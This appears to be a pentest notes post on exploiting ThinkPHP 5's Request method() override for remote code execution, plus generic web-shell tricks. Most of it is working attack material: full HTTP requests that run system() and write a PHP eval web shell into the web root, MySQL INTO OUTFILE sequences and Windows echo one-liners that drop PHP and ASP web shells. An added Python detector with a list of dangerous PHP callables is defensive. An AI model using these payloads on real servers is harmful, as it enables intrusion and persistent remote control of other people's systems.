This vulnerability lies in ThinkPHP's Request class, which handles HTTP requests; its method() method is used to obtain the current request type.
thinkphp/library/think/Request.php
 
First submit a request to obtain the directory path:
POST /index.php HTTP/1.1
Host: faka.test
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
_method=__construct&method=get&filter[]=system&get[]=dir
 
Then write the shell:
POST /index.php HTTP/1.1
Host: faka.test
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
_method=__construct&method=get&filter[]=system&get[]=echo ^<^?php @eval($_POST['abc']);?^>^ >D:\phpstudy_pro\WWW\faka\public\ant.php
 
The rest is handled with AntSword...
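As an added defensive example (not code from the original post), the following Python scans a raw HTTP request for the two ingredients of the request shown above: a `_method` override that is not an HTTP verb and a `filter[]` parameter naming a dangerous PHP callable. The function names and sample requests are constructed for this example.

```python
"""Detect the ThinkPHP 5 `_method` override abuse pattern in a raw request."""
from urllib.parse import parse_qs

# Verbs a legitimate form-method override may carry (PUT/DELETE/PATCH etc.).
HTTP_VERBS = {"GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS"}
# PHP callables that should never appear as a request filter.
DANGEROUS_FILTERS = {"system", "exec", "shell_exec", "passthru", "popen",
                     "proc_open", "assert", "eval", "call_user_func"}

# Constructed sample traffic: the first mirrors the shape of the request in
# the post, the second is a legitimate form-method override.
SUSPICIOUS = ("POST /index.php HTTP/1.1\r\nHost: example.test\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
              "_method=__construct&method=get&filter[]=system&get[]=dir")
BENIGN = ("POST /index.php HTTP/1.1\r\nHost: example.test\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          "_method=PUT&title=hello")


def parse_request(raw: str):
    """Split a raw HTTP request into (lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    headers = {}
    for line in head.split("\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def detect_method_override_abuse(raw: str) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    headers, body = parse_request(raw)
    ctype = headers.get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return []
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for value in params.get("_method", []):
        if value.upper() not in HTTP_VERBS:
            findings.append(f"non-HTTP _method override: {value}")
    for value in params.get("filter[]", []) + params.get("filter", []):
        if value.lower() in DANGEROUS_FILTERS:
            findings.append(f"dangerous filter callable: {value}")
    return findings


if __name__ == "__main__":
    for sample in (SUSPICIOUS, BENIGN):
        print(detect_method_override_abuse(sample))
```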
 
Exporting a shell with MySQL commands
-- INTO OUTFILE requires the FILE privilege and a secure_file_priv setting that permits the target directory.
create TABLE study (cmd text Not NULL);
insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'D:/php/www/htdocs/test/seven.php';
drop TABLE IF EXISTS study;
select '<?php eval($_POST[cmd]);?>' into outfile 'c:/inetpub/wwwroot/mysql.php/1.php';
-- Same sequence with a BLOB column instead of text
create TABLE study (cmd BLOB Not NULL);
insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'D:/php/www/htdocs/test/seven.php';
drop TABLE IF EXISTS study;
Getting a shell via command execution
echo ^<^?php @eval($_POST['abc']);?^>^ >c:\1.php
echo ^<^%eval request("abc")%^>^ >c:\1.php
 
Further reading:
https://sunjian.blog.csdn.net/article/details/113789521
https://blog.csdn.net/wuxianbing2012/article/details/104897634
Tools
BurpSuite v2.1